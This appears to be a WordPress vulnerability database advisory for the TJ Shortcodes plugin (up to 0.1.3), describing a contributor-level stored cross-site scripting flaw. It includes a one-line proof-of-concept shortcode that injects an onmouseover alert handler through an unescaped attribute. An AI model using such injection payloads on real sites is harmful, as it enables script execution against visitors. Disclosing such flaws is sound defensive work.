WordPress Plugin Vulnerabilities
TJ Shortcodes <= 0.1.3 - Contributor+ Stored XSS via Shortcodes
Description
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Proof of Concept
[junkie-button url="http://example.com" style="grey" size="small" type="round" target='" onmouseover="alert(/XSS/)"'] Button Text[/junkie-button]
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-04 (about 4 months ago)